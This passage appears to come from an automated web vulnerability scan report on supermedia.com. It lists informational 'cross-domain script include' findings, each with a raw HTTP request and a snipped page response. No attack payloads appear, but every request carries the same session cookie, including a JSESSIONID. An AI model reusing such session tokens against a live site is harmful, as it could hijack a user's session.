Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:26:42 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Direct Mail Advertising - Reach Local Customers with Direct Mail | SuperMedia.com Adverti
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.219. http://www.supermedia.com/direct-mail/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /direct-mail/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /direct-mail/ HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:21:38 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Direct Mail Advertising - Reach Local Customers with Direct Mail | SuperMedia.com Adverti
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.220. http://www.supermedia.com/direct-mail/call-tracking  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /direct-mail/call-tracking

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /direct-mail/call-tracking HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:21:52 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Call Tracking | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.221. http://www.supermedia.com/direct-mail/compare-direct-mail-options  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /direct-mail/compare-direct-mail-options

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /direct-mail/compare-direct-mail-options HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:21:54 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Compare Direct Mail Options | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.222. http://www.supermedia.com/direct-mail/postcards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /direct-mail/postcards

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /direct-mail/postcards HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:21:40 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Direct Mail Postcards | SuperMedia.com Advertising</title>



...[SNIP]...
<!--
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at http://corp.brightcove.com/legal/terms_publisher.cfm.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.223. http://www.supermedia.com/direct-mail/shared-card-packs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /direct-mail/shared-card-packs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /direct-mail/shared-card-packs HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:21:42 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Shared Card Packs Mailers | SuperMedia.com Advertising</title>



...[SNIP]...
<!--
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at http://corp.brightcove.com/legal/terms_publisher.cfm.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.224. http://www.supermedia.com/directory-options  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /directory-options

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /directory-options HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:18 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Directory Advertising Options | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.225. http://www.supermedia.com/domain-names  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /domain-names

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /domain-names HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Register a Domain Name | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.226. http://www.supermedia.com/ecommerce  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /ecommerce

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ecommerce HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:26 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Stores for Small Business Ecommerce | SuperMedia.com</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.227. http://www.supermedia.com/help  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /help

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:26:34 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.228. http://www.supermedia.com/help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /help/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/ HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:23:47 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.229. http://www.supermedia.com/help/account-information  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /help/account-information

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/account-information HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:23:58 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Account Information | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.230. http://www.supermedia.com/help/business-listings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /help/business-listings

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/business-listings HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:24:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Business Listings | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.231. http://www.supermedia.com/help/direct-mail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /help/direct-mail

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/direct-mail HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:24:01 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Ddirect Mail</title>


<link type="text/css" rel="st
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.232. http://www.supermedia.com/help/domains-email  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /help/domains-email

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/domains-email HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:24:06 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Domains and Email Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.233. http://www.supermedia.com/help/local-search-marketing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /help/local-search-marketing

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/local-search-marketing HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:24:07 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Local Search Marketing Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.234. http://www.supermedia.com/help/online-stores  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /help/online-stores

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/online-stores HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:24:11 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Online Stores Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.235. http://www.supermedia.com/help/search-marketing-services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /help/search-marketing-services

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/search-marketing-services HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:24:17 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Search Marketing Services Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.236. http://www.supermedia.com/help/telephone-service  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /help/telephone-service

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/telephone-service HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:24:20 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Telephone Service Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.237. http://www.supermedia.com/help/terms-conditions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /help/terms-conditions

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/terms-conditions HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:24:36 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Terms and Conditions | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.238. http://www.supermedia.com/help/web-hosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /help/web-hosting

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/web-hosting HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:24:34 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Web Site Hosting Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.239. http://www.supermedia.com/help/web-site-design  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /help/web-site-design

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/web-site-design HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:24:34 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Web Site Design Help | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
